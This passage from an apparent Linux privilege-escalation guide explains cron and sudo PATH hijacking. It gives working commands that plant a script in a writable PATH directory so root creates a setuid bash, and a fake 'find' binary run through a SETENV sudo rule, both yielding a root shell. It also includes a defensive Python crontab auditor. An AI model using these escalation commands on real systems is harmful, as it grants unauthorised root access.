For example, inside /etc/crontab you can find the PATH:

PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

(Note how the user « user » has write privileges over /home/user, and that this directory comes first in the PATH.)
If, inside this crontab, root executes a command or script without giving its full path, for example:

* * * * * root overwrite.sh

then cron resolves overwrite.sh through that PATH, and the first directory searched is the writable /home/user. You can get a root shell by using:
```bash
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
# Wait for the cron job to be executed
/tmp/bash -p  # -p keeps the effective uid and gid (setuid root) instead of resetting them to the real uid and gid
```
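As an added defender-side example (not code from the original page), the script below parses a system crontab, records which PATH directories a non-root user could write to, and flags every job that invokes a program by bare name, which is exactly the condition abused above. The sample crontab and the ownership/mode heuristic in writable_by_non_root are constructed assumptions; pass your own predicate to audit() if your policy differs.

```python
import os
import re
import shlex

# Constructed sample crontab modelled on the one above (not a real system file)
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root overwrite.sh
0 3 * * * root /usr/local/bin/backup.sh
"""
SHELL_BUILTINS = {"cd", "export", "set", "umask"}  # run without a PATH lookup
SPLIT_OPS = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")  # boundaries of simple commands

def parse_crontab(text):
    """Split system-crontab text into env assignments and (user, command) jobs."""
    env, jobs = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split()[0]:  # NAME=value line such as PATH=...
            name, _, value = line.partition("=")
            env[name.strip()] = value.strip().strip('"')
            continue
        fields = line.split(None, 6)  # five time fields, user, command
        if len(fields) == 7:
            jobs.append({"user": fields[5], "command": fields[6]})
    return env, jobs

def writable_by_non_root(path):
    """Assumed heuristic: dir not owned by root, or group/world writable."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return st.st_uid != 0 or bool(st.st_mode & 0o022)

def audit(text, is_writable=writable_by_non_root):
    """Flag jobs that name a program bare while PATH holds a writable directory."""
    env, jobs = parse_crontab(text)
    risky = [d for d in env.get("PATH", "").split(":") if d and is_writable(d)]
    findings = []
    for job in jobs:
        for segment in SPLIT_OPS.split(job["command"]):
            tokens = shlex.split(segment)
            if risky and tokens and "/" not in tokens[0] and tokens[0] not in SHELL_BUILTINS:
                findings.append({"user": job["user"], "program": tokens[0], "writable_path_dirs": risky})
    return findings
```

Run audit(open("/etc/crontab").read()) on a host to list jobs worth rewriting with absolute paths, or worth fixing by removing the writable directory from PATH.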
The same PATH hijack applies to sudo rules that grant SETENV on a script which calls binaries by bare name (here, find):

```bash
# sudo -l
wizard photobomb = (root) SETENV: NOPASSWD: /opt/cleanup.sh

# cleanup.sh
(...)
find / -name (...)
(...)

# EXPLOIT
cd /tmp
echo bash > find
chmod +x find
sudo PATH=$PWD:$PATH /opt/cleanup.sh
```